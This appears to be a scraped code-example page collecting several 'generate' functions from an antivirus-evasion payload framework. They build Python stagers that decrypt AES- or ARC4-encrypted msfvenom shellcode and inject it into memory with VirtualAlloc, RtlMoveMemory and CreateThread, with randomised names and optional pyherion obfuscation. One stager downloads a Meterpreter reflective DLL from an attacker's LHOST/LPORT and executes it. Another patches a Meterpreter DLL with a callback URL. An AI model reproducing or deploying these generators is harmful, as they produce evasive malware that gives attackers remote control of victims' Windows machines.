payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
#.........这里部分代码省略.........
示例10: generate
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
#.........这里部分代码省略.........
示例11: generate
def generate(self):
    """Build a Python (2) stager that downloads a reflective DLL via httplib and runs it.

    Same structure as the ``urllib2`` variant on this page, but the download
    function uses ``httplib.HTTPSConnection`` directly: it issues
    ``GET /<check-in URI>`` and returns the body only when the response
    status is 200, otherwise ``""``.  No proxy handling, no User-Agent, no
    size gate and no exception handling in the generated download code.

    Emitted pieces (names randomised per build):
      * checksum helper -- ``sum(ord(ch)) % 0x100``;
      * check-in URI generator -- up to 64 attempts for a 4-char path with
        checksum 92 (the value the handler matches, per the original comment);
      * download function as described above;
      * inject function -- VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE,
        0x40 = PAGE_EXECUTE_READWRITE), RtlMoveMemory, CreateThread,
        WaitForSingleObject; skipped when the download returned ``""``;
      * top-level code that downloads from ``LHOST``/``LPORT`` and injects.

    Returns the stager as a string, optionally wrapped by
    ``encryption.pyherion`` when ``use_pyherion`` is ``y``.

    NOTE(review): the generated URI function returns ``None`` if none of the
    64 attempts hits checksum 92, so the request path becomes ``/None``.
    Generated code is Python 2 only (``xrange``, ``httplib``).  Any socket or
    TLS error in the stub's download call propagates uncaught.
    """
    payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
    # randomize everything, yo'
    sumMethodName = helpers.randomString()
    checkinMethodName = helpers.randomString()
    randLettersName = helpers.randomString()
    randLetterSubName = helpers.randomString()
    randBaseName = helpers.randomString()
    downloadMethodName = helpers.randomString()
    hostName = helpers.randomString()
    portName = helpers.randomString()
    requestName = helpers.randomString()
    responseName = helpers.randomString()
    injectMethodName = helpers.randomString()
    dataName = helpers.randomString()
    byteArrayName = helpers.randomString()
    ptrName = helpers.randomString()
    bufName = helpers.randomString()
    handleName = helpers.randomString()
    data2Name = helpers.randomString()
    # helper method that returns the sum of all ord values in a string % 0x100
    # (``%%`` is a literal percent sign after %-formatting)
    payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
    # method that generates a new checksum value for checkin to the meterpreter handler
    # 3 random base chars + 1 suffix char; first combo with checksum 92 wins,
    # None after 64 outer iterations (see docstring)
    payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
    payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
    payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
    payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
    payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
    # method that connects to a host/port over https and downloads the hosted data
    # (httplib.HTTPSConnection; the check-in URI is computed at call time)
    payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
    payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName)
    payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName)
    payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName)
    # only a 200 response body is returned; anything else yields ""
    payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName)
    payloadCode += "\telse: return \"\"\n"
    # method to inject a reflective .dll into memory
    payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
    payloadCode += "\tif %s != \"\":\n" %(dataName)
    payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
    payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
    payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
    payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
    # download the meterpreter .dll and inject it
    payloadCode += "%s = ''\n" %(data2Name)
    # LHOST/LPORT inserted verbatim from the options (no validation)
    payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
    if self.required_options["use_pyherion"][0].lower() == "y":
        # optional extra encryption/obfuscation layer (project module)
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
示例12: generate
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
#.........这里部分代码省略.........
示例13: generate
#.........这里部分代码省略.........
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"http://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ helpers.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += "import ctypes,base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
payloadCode += (
randPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ randVarName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
payloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ randPtr
+ "),"
+ randBuf
+ ",ctypes.c_int(len("
+ randVarName
+ ")))\n"
)
payloadCode += (
randHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ randPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
示例14: generate
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
#.........这里部分代码省略.........
示例15: generate
#.........这里部分代码省略.........
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions